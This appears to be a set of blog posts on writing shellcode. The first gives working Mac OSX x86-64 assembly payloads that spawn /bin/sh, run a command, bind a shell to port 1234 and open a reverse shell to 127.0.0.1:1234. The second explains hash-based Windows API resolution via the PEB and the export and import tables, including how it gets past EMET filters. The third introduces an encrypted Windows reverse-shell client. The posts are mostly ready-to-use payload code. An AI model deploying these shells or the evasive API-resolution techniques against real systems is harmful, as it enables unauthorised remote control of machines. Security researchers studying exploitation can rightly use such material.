Shellcode: Mac OSX x86-64

Introduction

Since Mac OSX is derived from BSD sources, I wrongly presumed the BSD codes would work without problem. 0x4d_ having a Mac was able to confirm they did not work and so we realized quickly the solution was simply setting bit 25 of EAX register using BTS instruction (Bit Test and Set).

;
    bts  eax, 25

You can set alternatively using ROL/ROR/SHL.

Apple does it their way

System calls in OSX follow the AMD64 ABI except for one minor difference. The last 8-bits of EAX register represent the “class” of system call as described by Dustin Schultz in Mac OS X 64 Bit Assembly System Calls.

Mac OS X or likely BSD has split up the system call numbers into several different β€œclasses.” The upper order bits of the syscall number represent the class of the system call, in the case of write and exit, it’s SYSCALL_CLASS_UNIX and hence the upper order bits are 2! Thus, every Unix system call will be (0Γ—2000000 + unix syscall #).

The main difference between system calls on Mac OSX and BSD (which OSX is derived from) is the class. As you can see defined in syscall_sw.h

/*
 * Syscall classes for 64-bit system call entry.
 * For 64-bit users, the 32-bit syscall number is partitioned
 * with the high-order bits representing the class and low-order
 * bits being the syscall number within that class.
 * The high-order 32-bits of the 64-bit syscall number are unused.
 * All system classes enter the kernel via the syscall instruction.
 *
 * These are not #ifdef'd for x86-64 because they might be used for
 * 32-bit someday and so the 64-bit comm page in a 32-bit kernel
 * can use them.
 */
#define SYSCALL_CLASS_SHIFT	24
#define SYSCALL_CLASS_MASK	(0xFF << SYSCALL_CLASS_SHIFT)
#define SYSCALL_NUMBER_MASK	(~SYSCALL_CLASS_MASK)

#define SYSCALL_CLASS_NONE	0	/* Invalid */
#define SYSCALL_CLASS_MACH	1	/* Mach */	
#define SYSCALL_CLASS_UNIX	2	/* Unix/BSD */
#define SYSCALL_CLASS_MDEP	3	/* Machine-dependent */
#define SYSCALL_CLASS_DIAG	4	/* Diagnostics */

So when constructing a system call, they use the following macro defined in same header file.

#define SYSCALL_CONSTRUCT_UNIX(syscall_number) \
    ((SYSCALL_CLASS_UNIX << SYSCALL_CLASS_SHIFT) | \
     (SYSCALL_NUMBER_MASK & (syscall_number)))

Spawn /bin/sh

; 26 bytes execute /bin/sh
;
    bits    64

    xor     esi, esi         ; esi = 0
    mul     esi              ; eax = 0, edx = 0
    bts     eax, 25          ; eax = 0x02000000
    mov     al, 59           ; rax = sys_execve
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; rdi="/bin//sh", 0
    syscall

Execute command

; 43 bytes execute command
;
    bits    64

    push    59
    pop     rax         ; eax = sys_execve
    cdq                 ; edx = 0
    bts     eax, 25     ; eax = 0x0200003B
    mov     rbx, '/bin//sh'
    push    rdx         ; 0
    push    rbx         ; "/bin//sh"
    push    rsp
    pop     rdi         ; rdi="/bin//sh", 0
    ; ---------
    push    rdx         ; 0
    push    word '-c'
    push    rsp
    pop     rbx         ; rbx="-c", 0
    push    rdx         ; argv[3]=NULL
    jmp     l_cmd64
r_cmd64:                ; argv[2]=cmd
    push    rbx         ; argv[1]="-c"
    push    rdi         ; argv[0]="/bin//sh"
    push    rsp
    pop     rsi         ; rsi=argv
    syscall
l_cmd64:
    call    r_cmd64
    ; put your command here followed by null terminator

Bind port to shell

; 91 bytes bind shell
;
    bits 64
    
    mov     eax, ~0xd2040200 & 0xFFFFFFFF
    not     eax
    push    rax
    
    xor     ebp, ebp
    bts     ebp, 25
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax              ; rax = 0x02000000
    cdq                      ; rdx = IPPROTO_IP
    push    1
    pop     rsi              ; rsi = SOCK_STREAM
    push    2
    pop     rdi              ; rdi = AF_INET   
    mov     al, 97           ; eax = sys_socket
    syscall
    
    xchg    eax, edi         ; edi=s
    xchg    eax, ebx         ; ebx=2
    
    ; step 2, bind to port 1234 
    ; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
    push    rbp
    pop     rax
    push    rsp
    pop     rsi
    mov     dl, 16
    mov     al, 104
    syscall
    
    ; step 3, listen
    ; listen(s, 0);
    push    rax
    pop     rsi
    push    rbp
    pop     rax    
    mov     al, 106
    syscall
    
    ; step 4, accept connections
    ; accept(s, 0, 0);
    push    rbp
    pop     rax    
    mov     al, 30
    cdq
    syscall
    
    xchg    eax, edi         ; edi=r
    push    rbx              ; rsi=2
    pop     rsi
    
    ; step 5, assign socket handle to stdin,stdout,stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
dup_loop64:
    push    rbp
    pop     rax
    mov     al, 90           ; rax=sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed   
    
    ; step 6, execute /bin/sh
    ; execve("/bin//sh", {"/bin//sh", NULL}, 0);
    xor     esi, esi 
    cdq                      ; rdx=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    ; ---------
    push    rbp
    pop     rax    
    mov     al, 59           ; rax=sys_execve
    syscall

Reverse connect shell

; 79 byte reverse shell
;
    bits    64

    mov     rcx, ~0x0100007fd2040200
    not     rcx
    push    rcx
    
    xor     ebp, ebp
    bts     ebp, 25
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax
    cdq                      ; rdx=IPPROTO_IP
    push    1
    pop     rsi              ; rsi=SOCK_STREAM
    push    2
    pop     rdi              ; rdi=AF_INET  
    mov     al, 97
    syscall
    
    xchg    eax, edi         ; edi=s
    xchg    eax, esi         ; esi=2
    
    ; step 2, assign socket handle to stdin,stdout,stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
dup_loop64:
    push    rbp
    pop     rax              ; eax = 0x02000000 
    mov     al, 90           ; rax=sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed
    
    ; step 3, connect to remote host
    ; connect (sockfd, {AF_INET,1234,127.0.0.1}, 16);
    push    rbp
    pop     rax
    push    rsp
    pop     rsi
    mov     dl, 16           ; rdx=sizeof(sa)
    mov     al, 98           ; rax=sys_connect
    syscall    
    
    ; step 4, execute /bin/sh
    ; execve("/bin//sh", NULL, 0);
    push    rax
    pop     rsi
    push    rbp
    pop     rax
    cdq                      ; rdx=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    mov     al, 59           ; rax=sys_execve
    syscall

Sources

See here but bear in mind the x86 code hasn’t been tested.

Thanks to 0x4d_ for helping fix problems with initial codes.

Posted in assembly, osx, security, shellcode | Tagged , , , | Leave a comment

Shellcode: Resolving API addresses in memory

Introduction

A basic but core function of all Position Independent Code (PIC) for windows is to resolve the address of API functions at runtime. It’s an important task with a number of options available. Here, we’ll examine 2 popular methods using the Import Address Table (IAT) and Export Address Table (EAT) which are by far the most stable. (for this kind of code)

Since the release of Windows Vista in 2007, Address space layout randomization (ASLR) is enabled for executables and dynamic link libraries specifically linked to be ASLR-enabled which mitigates exploitation of vulnerabilities.

But even long before ASLR arrived, virus writers over 20 years ago faced a similar problem with the unintentional “randomization” of the base address for kernel32.dll.

The first Windows virus called Bizatch was written by Quantum/VLAD on a beta copy of Windows 95. The virus used hardcoded API and as a result simply crashed on versions of windows that had a different base address for kernel32.dll.

Mr. Sandman, Jacky Qwerty and GriYo discussed “the kernel32 problem” and “the GetModuleHandle solution” in PE infection under Win32 and weren’t aware of the Process Environment Block (PEB) under NT at the time which was discussed later by Ratter in Gaining important datas from PEB under NT boxes..

Jacky Qwerty published a A GetProcAddress-alike utility which initially became a “standard” method of resolving API addressses in viruses.

At some point after this, authors started resolving the API by CRC32 checksum, presumably to hide strings of API in their code and also to reduce space.

LethalMind showed in 1999 a way to resolve API using his own checksum in Retrieving API Addresses. Then of course LSD group proposed in 2002 their own ARX based algorithm in WIN32 Assembly components (shellcodes) which was the basis for many win32 shellcodes that followed.

That’s just a brief (potentially inaccurate) historical context of where most of the basic ideas for resolving API came from. Today of course, there are many more advanced challenges to overcome when exploiting vulnerabilities but they are largely related to protection mechanisms and not what I’ll discuss here.

All the structures displayed here can be found in WinNT.h from the Microsoft SDK which should be included with MSVC if you have it installed.

You can find detailed description of PE/PE+ format in pecoff.docx

Image DOS Header

At the start of every PE file we find an MS-DOS executable or a “stub” that makes any PE file a valid MS-DOS executable.

The only field we need here is e_lfanew which when added to the current base address of module gives us a pointer to NT_IMAGE_HEADERS

// DOS .EXE header
typedef struct _IMAGE_DOS_HEADER {      
    WORD   e_magic;     // Magic number
    WORD   e_cblp;      // Bytes on last page of file
    WORD   e_cp;        // Pages in file
    WORD   e_crlc;      // Relocations
    WORD   e_cparhdr;   // Size of header in paragraphs
    WORD   e_minalloc;  // Minimum extra paragraphs needed
    WORD   e_maxalloc;  // Maximum extra paragraphs needed
    WORD   e_ss;        // Initial (relative) SS value
    WORD   e_sp;        // Initial SP value
    WORD   e_csum;      // Checksum
    WORD   e_ip;        // Initial IP value
    WORD   e_cs;        // Initial (relative) CS value
    WORD   e_lfarlc;    // File address of relocation table
    WORD   e_ovno;      // Overlay number
    WORD   e_res[4];    // Reserved words
    WORD   e_oemid;     // OEM identifier (for e_oeminfo)
    WORD   e_oeminfo;   // OEM information; e_oemid specific
    WORD   e_res2[10];  // Reserved words
    LONG   e_lfanew;    // File address of new exe header
  } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

Image NT Headers

Because the base address for mapped PE image in memory can be “random”, only the Relative Virtual Address (RVA) of important structures are saved in PE file.

To convert a RVA to Virtual Address (VA) we can use the following macro.

#define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)

Once we add e_lfanew to the base address, we then have a pointer to IMAGE_NT_HEADERS.

The following 2 structures are defined in WinNT.h but only one is used depending on architecture C code is compiled for.

We’re interested in the OptionalHeader field which contains among other things information about import and export directories.

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef struct _IMAGE_NT_HEADERS {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

Image Optional Header

At the end of Optional Header is an array of IMAGE_DATA_DIRECTORY structures.

// Directory Entries

#define IMAGE_DIRECTORY_ENTRY_EXPORT 0   // Export Directory
#define IMAGE_DIRECTORY_ENTRY_IMPORT 1   // Import Directory
//
// Optional header format.
//

typedef struct _IMAGE_OPTIONAL_HEADER {
  //
  // Standard fields.
  //

  WORD    Magic;
  BYTE    MajorLinkerVersion;
  BYTE    MinorLinkerVersion;
  DWORD   SizeOfCode;
  DWORD   SizeOfInitializedData;
  DWORD   SizeOfUninitializedData;
  DWORD   AddressOfEntryPoint;
  DWORD   BaseOfCode;
  DWORD   BaseOfData;

  //
  // NT additional fields.
  //

  DWORD   ImageBase;
  DWORD   SectionAlignment;
  DWORD   FileAlignment;
  WORD    MajorOperatingSystemVersion;
  WORD    MinorOperatingSystemVersion;
  WORD    MajorImageVersion;
  WORD    MinorImageVersion;
  WORD    MajorSubsystemVersion;
  WORD    MinorSubsystemVersion;
  DWORD   Win32VersionValue;
  DWORD   SizeOfImage;
  DWORD   SizeOfHeaders;
  DWORD   CheckSum;
  WORD    Subsystem;
  WORD    DllCharacteristics;
  DWORD   SizeOfStackReserve;
  DWORD   SizeOfStackCommit;
  DWORD   SizeOfHeapReserve;
  DWORD   SizeOfHeapCommit;
  DWORD   LoaderFlags;
  DWORD   NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;

Image Data Directory

Each directory holds a VA and size of directory. To access the export or import directory, simply add the VirtualAddress to base using RVA2VA macro.

//
// Directory format.
//

typedef struct _IMAGE_DATA_DIRECTORY {
    DWORD   VirtualAddress;
    DWORD   Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES    16
  • VirtualAddress
  • RVA of the data structure. For example, if this structure is for import symbols, this field contains the RVA of the IMAGE_IMPORT_DESCRIPTOR array.

  • Size
  • Contains the size in bytes of the data structure referred to by VirtualAddress.

Image Export Directory

Since exports are first in the list of directories, let’s examine this method of retrieval.

//
// Export Format
//

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;     // RVA from base of image
    DWORD   AddressOfNames;         // RVA from base of image
    DWORD   AddressOfNameOrdinals;  // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

We’re interested in 5 fields.

  • Name
  • RVA of a string for DLL name.

  • NumberOfNames
  • The number of exported API by name.

  • AddressOfFunctions
  • RVA to array of RVAs. When each RVA is added to base address of module, they will give us the address of an exported API.

  • AddressOfNames
  • RVA to array of RVAs. When each RVA is added to base address of module, it will give us the address of a null terminated string representing an exported API.

  • AddressOfNameOrdinals
  • RVA to array of ordinals. Each ordinal represents an index in AddressOfFunctions array.

The following function will retrieve an API address from the export table using CRC-32C of DLL and API name.

base parameter is obviously base address of DLL and hash is derived from the addition of 2 CRC-32C hashes. crc32c(DLL string) + crc32c(API string).

LPVOID search_exp(LPVOID base, DWORD hash)
{
  PIMAGE_DOS_HEADER       dos;
  PIMAGE_NT_HEADERS       nt;
  DWORD                   cnt, rva, dll_h;
  PIMAGE_DATA_DIRECTORY   dir;
  PIMAGE_EXPORT_DIRECTORY exp;
  PDWORD                  adr;
  PDWORD                  sym;
  PWORD                   ord;
  PCHAR                   api, dll;
  LPVOID                  api_adr=NULL;
  
  dos = (PIMAGE_DOS_HEADER)base;
  nt  = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
  dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
  rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
  
  // if no export table, return NULL
  if (rva==0) return NULL;
  
  exp = (PIMAGE_EXPORT_DIRECTORY) RVA2VA(ULONG_PTR, base, rva);
  cnt = exp->NumberOfNames;
  
  // if no api, return NULL
  if (cnt==0) return NULL;
  
  adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
  sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
  ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
  dll = RVA2VA(PCHAR, base, exp->Name);
  
  // calculate hash of DLL string
  dll_h = crc32c(dll);
  
  do {
    // calculate hash of api string
    api = RVA2VA(PCHAR, base, sym[cnt-1]);
    // add to DLL hash and compare
    if (crc32c(api) + dll_h == hash) {
      // return address of function
      api_adr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
      return api_adr;
    }
  } while (--cnt && api_adr==0);
  return api_adr;
}

One important thing to mention is that this function does not resolve API by ordinal nor does it resolve forward references which can sometimes be a problem.

Here’s some assembly to perform the same thing.

; in:  ebx = base of module to search
;      ecx = hash to find
;
; out: eax = api address resolved in EAT
;
search_expx:
    pushad
    ; eax = IMAGE_DOS_HEADER.e_lfanew
    mov    eax, [ebx+3ch]

    ; first directory is export
    ; ecx = IMAGE_DATA_DIRECTORY.VirtualAddress
    mov    ecx, [ebx+eax+78h]
    jecxz  exp_l2

    ; eax = crc32c(IMAGE_EXPORT_DIRECTORY.Name)
    mov    eax, [ebx+ecx+0ch]
    add    eax, ebx
    call   crc32c
    mov    [esp+_edx], eax

    ; esi = IMAGE_EXPORT_DIRECTORY.NumberOfNames
    lea    esi, [ebx+ecx+18h]
    push   4
    pop    ecx         ; load 4 RVA
exp_l0:
    lodsd              ; load RVA
    add    eax, ebx    ; eax = RVA2VA(ebx, eax)
    push   eax         ; save VA
    loop   exp_l0

    pop    edi          ; edi = AddressOfNameOrdinals
    pop    edx          ; edx = AddressOfNames
    pop    esi          ; esi = AddressOfFunctions
    pop    ecx          ; ecx = NumberOfNames

    sub    ecx, ebx     ; ecx = VA2RVA(NumberOfNames, base)
    jz     exp_l2       ; exit if no api
exp_l3:
    mov    eax, [edx+4*ecx-4] ; get VA of API string
    add    eax, ebx           ; eax = RVA2VA(eax, ebx)
    call   crc32c             ; generate crc32 of api string
    add    eax, [esp+_edx]    ; add crc32 of DLL string

    cmp    eax, [esp+_ecx]    ; found match?
    loopne exp_l3             ; --ecx && eax != hash
    jne    exp_l2             ; exit if not found

    xchg   eax, ebx
    xchg   eax, ecx

    movzx  eax, word [edi+2*eax] ; eax = AddressOfOrdinals[eax]
    add    ecx, [esi+4*eax] ; ecx = base + AddressOfFunctions[eax]
exp_l2:
    mov    [esp+_eax], ecx
    popad
    ret

So that’s the basic method to search through exports. Now for the imports which is a little trickier.

Image Import Descriptor

The release of Enhanced Mitigation Experience Toolkit (EMET) by Microsoft in 2009 broke some existing shellcodes that searched the export directory for API.

EMET includes Export Address Table Access Filtering (EAF) and EAF+ since the release of 5.2, both of which serve to block read attempts of the export and import directories originating from modules commonly used to probe memory during the exploitation of vulnerabilities.

Typically, a shellcode using the IAT will resolve addresses for GetModuleHandle and GetProcAddress before resolving the rest by string.

If a PE file imports API from other modules, the import directory will contain an array of image import descriptors, each one representing a module.

typedef struct _IMAGE_IMPORT_DESCRIPTOR {
  union {
    DWORD Characteristics; // 0 for terminating null import descriptor
    DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA)
  } DUMMYUNIONNAME;
  DWORD TimeDateStamp;        // 0 if not bound,
                              // -1 if bound, and real date\time stamp
                              //  in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
                              // O.W. date/time stamp of DLL bound to (Old BIND)

  DWORD ForwarderChain;       // -1 if no forwarders
  DWORD Name;
  DWORD FirstThunk;           // RVA to IAT (if bound this IAT has actual addresses)
} IMAGE_IMPORT_DESCRIPTOR;
typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR;

The 3 fields we’re interested in are:

  • OriginalFirstThunk
  • Contains offsets to the names of the imported functions.

  • Name
  • Null terminated string of the module to import API from.

  • FirstThunk
  • Contains offsets to the actual addresses of the functions.

Image Thunk Data

Each descriptor contains RVA that points to array of Image Thunk Data structures. Each entry represents information about the imported API.

typedef struct _IMAGE_THUNK_DATA32 {
    union {
        DWORD ForwarderString;      // PBYTE 
        DWORD Function;             // PDWORD
        DWORD Ordinal;
        DWORD AddressOfData;        // PIMAGE_IMPORT_BY_NAME
    } u1;
} IMAGE_THUNK_DATA32;
typedef IMAGE_THUNK_DATA32 * PIMAGE_THUNK_DATA32;

In the code, I skip entries that are imported by ordinal.

The AddressOfData from OriginalFirstThunk is an RVA that points to an IMPORT_BY_NAME structure.

The Function field from FirstThunk points to actual address of API function we’re searching for.

Import By Name

Since we’re not importing by ordinal, we don’t care about the hint field, just the name which is null terminated API string.

typedef struct _IMAGE_IMPORT_BY_NAME {
    WORD    Hint;
    BYTE    Name[1];
} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME;
  • Hint
  • Contains an index into the export table of the DLL the function resides in. This field is for use by the PE loader so it can look up the function in the DLL’s export table quickly.This value is not essential and some linkers may set the value in this field to 0.

  • Name
  • Contains the name of the import function. The name is an ASCIIZ string. Note that Name’s size is defined as byte but it’s really a variable-sized field. It’s just that there is no way to represent a variable-sized field in a structure. The structure is provided so that you can refer to the data structure with descriptive names.

The following code will search import address table for API address using CRC-32C hash of DLL and API strings.

LPVOID search_imp(LPVOID base, DWORD hash)
{
  DWORD                    dll_h, i, rva;
  PIMAGE_IMPORT_DESCRIPTOR imp;
  PIMAGE_THUNK_DATA        oft, ft;
  PIMAGE_IMPORT_BY_NAME    ibn;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PIMAGE_DATA_DIRECTORY    dir;
  PCHAR                    dll;
  LPVOID                   api_adr=NULL;
  
  dos = (PIMAGE_DOS_HEADER)base;
  nt  = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
  dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
  rva = dir[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
  
  // if no import table, return
  if (rva==0) return NULL;

  imp  = (PIMAGE_IMPORT_DESCRIPTOR) RVA2VA(ULONG_PTR, base, rva);
  
  for (i=0; api_adr==NULL; i++) 
  {
    if (imp[i].Name == 0) return NULL;
    
    dll   = RVA2VA(PCHAR, base, imp[i].Name);
    dll_h = crc32c(dll); 
    
    rva   = imp[i].OriginalFirstThunk;
    oft   = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
    
    rva   = imp[i].FirstThunk;
    ft    = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
        
    for (;; oft++, ft++) 
    {
      if (oft->u1.Ordinal == 0) break;
      // skip import by ordinal
      if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) continue;
      
      rva = oft->u1.AddressOfData;
      ibn = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
      
      if ((crc32c(ibn->Name) + dll_h) == hash) {
        api_adr = (LPVOID)ft->u1.Function;
        break;
      }
    }
  }
  return api_adr;
}

The assembly follows same alogorithm above but with some optimizations.

; in: ebx = base of module to search
;     ecx = hash to find
;
; out: eax = api address resolved in IAT
;
search_impx:
    xor    eax, eax    ; api_adr = NULL
    pushad
    ; eax = IMAGE_DOS_HEADER.e_lfanew
    mov    eax, [ebx+3ch]
    add    eax, 8     ; add 8 for import directory

    ; eax = IMAGE_DATA_DIRECTORY.VirtualAddress
    mov    eax, [ebx+eax+78h]
    test   eax, eax
    jz     imp_l2

    lea    ebp, [eax+ebx]
imp_l0:
    mov    esi, ebp      ; esi = current descriptor
    lodsd                ; OriginalFirstThunk +00h
    xchg   eax, edx      ; temporarily store in edx
    lodsd                ; TimeDateStamp      +04h
    lodsd                ; ForwarderChain     +08h
    lodsd                ; Name               +0Ch
    test   eax, eax
    jz     imp_l2        ; if (Name == 0) goto imp_l2;

    add    eax, ebx
    call   crc32c
    mov    [esp+_edx], eax

    lodsd                 ; FirstThunk
    mov    ebp, esi       ; ebp = next descriptor

    lea    esi, [edx+ebx] ; esi = OriginalFirstThunk + base
    lea    edi, [eax+ebx] ; edi = FirstThunk + base
imp_l1:
    lodsd                 ; eax = oft->u1.Function, oft++;
    scasd                 ; ft++;
    test   eax, eax       ; if (oft->u1.Function == 0)
    jz     imp_l0         ; goto imp_l0
    js     imp_l1         ; oft->u1.Ordinal & IMAGE_ORDINAL_FLAG

    lea    eax, [eax+ebx+2] ; oft->Name_
    call   crc32c           ; get crc of API string

    add    eax, [esp+_edx]  ; eax = api_h + dll_h
    cmp    [esp+_ecx], eax  ; found match?
    jne    imp_l1

    mov    eax, [edi-4]     ; ft->u1.Function
imp_l2:
    mov    [esp+_eax], eax
    popad
    ret

Process Environment Block

Perhaps this part should precede everything else?

Another “advancement” arrived with the publication of Gaining important datas from PEB under NT boxes by Ratter/29A in 2002. There was a better way to obtain base address of KERNEL32.DLL simply by reading it from the PEB.

Here I’m using structures from Matt Graeber’s PIC_Bindshell

LPVOID getapi (DWORD dwHash)
{
  PPEB                     peb;
  PMY_PEB_LDR_DATA         ldr;
  PMY_LDR_DATA_TABLE_ENTRY dte;
  LPVOID                   api_adr=NULL;
  
#if defined(_WIN64)
  peb = (PPEB) __readgsqword(0x60);
#else
  peb = (PPEB) __readfsdword(0x30);
#endif

  ldr = (PMY_PEB_LDR_DATA)peb->Ldr;
  
  // for each DLL loaded
  for (dte=(PMY_LDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL && api_adr == NULL; 
       dte=(PMY_LDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    api_adr=search_imp(dte->DllBase, dwHash);
  }
  return api_adr;
}

The assembly is purely based on same algorithm but with some minor optimizations.

; LPVOID get_apix(DWORD hash);
get_apix:
_get_apix:
    pushad
    mov    ecx, [esp+32+4] ; ecx = hash
    push   30h
    pop    eax

    mov    eax, [fs:eax]  ; eax = (PPEB) __readfsdword(0x30);
    mov    eax, [eax+0ch] ; eax = (PMY_PEB_LDR_DATA)peb->Ldr
    mov    edi, [eax+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
    jmp    gapi_l1
gapi_l0:
    call   search_expx
    test   eax, eax
    jnz    gapi_l2

    mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink
gapi_l1:
    mov    ebx, [edi+18h] ; ebx = dte->DllBase
    test   ebx, ebx
    jnz    gapi_l0
    xchg   eax, ebx
gapi_l2:
    mov    [esp+_eax], eax
    popad
    ret

Hash algorithm

For both examples, I use CRC-32C checksum. The C stands for Castagnoli polynomial. I’ve used it simply because there were no collisions for 80,000 API tested. Some existing hash algorithms provide “good enough” results but the advantage of using CRC-32C is that it is now supported by INTEL cpus since the release of SSE4.2

It should be clear however that the OR operation of bytes with 0x20 is not part of the CRC-32C specification. This is only here to convert strings to lowercase before hashing. Sometimes kernel32.dll can appear as uppercase so it should be converted to lowercase.

In the Metasploit code, the module is converted to uppercase instead.

uint32_t crc32c(const char *s)
{
  int i;
  uint32_t crc=0;
  
  do {
    crc ^= (uint8_t)(*s++ | 0x20);
    
    for (i=0; i<8; i++) {
      crc = (crc >> 1) ^ (0x82F63B78 * (crc & 1));
    }
  } while (*(s - 1) != 0);
  return crc;
}

Here’s the code using built in instruction.

;
    xor    eax, eax
    cdq
crc_l0:
    lodsb
    or     al, 0x20
    crc32  edx, al
    cmp    al, 0x20
    jne    crc_l0

Here’s code for CPUs without the support for SSE4.2

; in: eax = s
; out: crc-32c(s)
;
crc32c:    
    pushad
    xchg   eax, esi          ; esi = s
    xor    eax, eax          ; eax = 0
    cdq                      ; edx = 0
crc_l0:
    lodsb                    ; al = *s++ | 0x20
    or     al, 0x20
    xor    dl, al            ; crc ^= c
    push   8
    pop    ecx    
crc_l1:
    shr    edx, 1            ; crc >>= 1
    jnc    crc_l2
    xor    edx, 0x82F63B78
crc_l2:
    loop   crc_l1
    sub    al, 0x20          ; until al==0
    jnz    crc_l0    
    mov    [esp+_eax], edx
    popad
    ret

Of course, CRC-32C is not collision resistant. In some cases, you might need to consider using a cryptographic hash algorithm. The smallest I can think of would be CubeHash by Daniel Bernstein.

Although, you could also use a tiny block or stream cipher to encrypt the strings and truncate the ciphertext to 32 or 64-bits. Not sure how collision resistant that would be but it’s worth exploring.

Summary

Parsing the import and export tables isn’t a really difficult task. With all the sources and documentation available, there’s really no excuse to avoid using either in a PIC. Using hardcoded API or looking up by ordinal are recipe for a disaster.

By writing your code in C first and generating assembly output with /FAs switch of MSVC, this should make parsing in assembly much easier to understand.

getapi.c contains code in C to locate API by CRC-32C hash. x86.asm and x64.asm contain the code in assembly to locate API by CRC-32C hash.

Posted in assembly, programming, shellcode, windows | Tagged , , , , , , , , | 2 Comments

Shellcode: A Windows PIC using RSA-2048 key exchange, AES-256, SHA-3

Introduction

This won’t be a tutorial on writing shellcode although you might glean something useful from the source code when writing your own PIC in C. This is a PIC (Position Independent Code) for the Windows Operating System written in C with some additional assembly code to handle stack limit issues. There are C arrays of the assembly code for x86 here and for x64 here. You must change the IP address from 127.0.0.1 and port number 1234 if testing for remote systems.

The idea of writing windows shellcodes with C is nothing new and was demonstrated by a number of people already. AFAIK, the first example of this was shown by Didier Stevens in his 2010 article for hakin9 magazine simply called Writing WIN32 Shellcode With a C-compiler.

Nick Harbour also discusses the idea in Writing Shellcode with a C Compiler and Matt Graeber shows how to build a bind shell in his article Writing Optimized Windows Shellcode in C which I’ve borrowed some ideas and code from for my own PIC.

Just this year, a Shellcode Compiler was released which can compile a script into assembly. Of course there are other source codes out there such as this and even a c++ example such as this taking advantage of the constexpr feature.

Apologies to anyone who has been involved with this subject that I missed.

In March this year, I wrote a 4 part series on some simple interactive “shells” for the windows operating system and the PIC client here can be used with this server which is derived from s4.c discussed in Part 4. The main difference is the PIC client and new server both use SHA-3 and AES-256 for authenticated encryption with some modular arithmetic functions to perform key exchange similar to RSA.

Those of you familiar with shellcode found in generators such as Veil, Metasploit or at online shellcode databases like Exploit Database will know they do not use encrypted communication between two hosts except if using WININET API for TLS connections or a static key with RC4.

I’ll just briefly discuss some things that are good to know when writing your own PIC in C for Windows. I’ll continue to update this as code develops.

  1. C or C++?
  2. C or ASM?
  3. Memory layout
  4. Resolving API
  5. Storing strings
  6. CPU intrinsics
  7. Big number arithmetic
  8. Authenticated Encryption
  9. Todo

C or C++?

Those of you familiar with OOP (Object Oriented Programming) languages will know what a class is and the purpose of properties and methods.

C is a POP (Procedure Oriented Programming) language which doesn’t support classes but we can emulate them using structures and the reason I’m using C and not C++ to write a PIC has nothing to do with understanding object oriented concepts. I just feel C++ is too close to Java, .NET and other managed code which all hide a lot of low level code from the programmer.

There are new features of C++ that would be invaluable for developing PICs and I encourage anyone to explore its features and not be dissuaded by my decision to use C instead.

One such feature is the constexpr specifier which is incredibly useful for generating hashes of strings at compile time whereas with C, they need to be hardcoded unless linking with some assembly code containing macros.

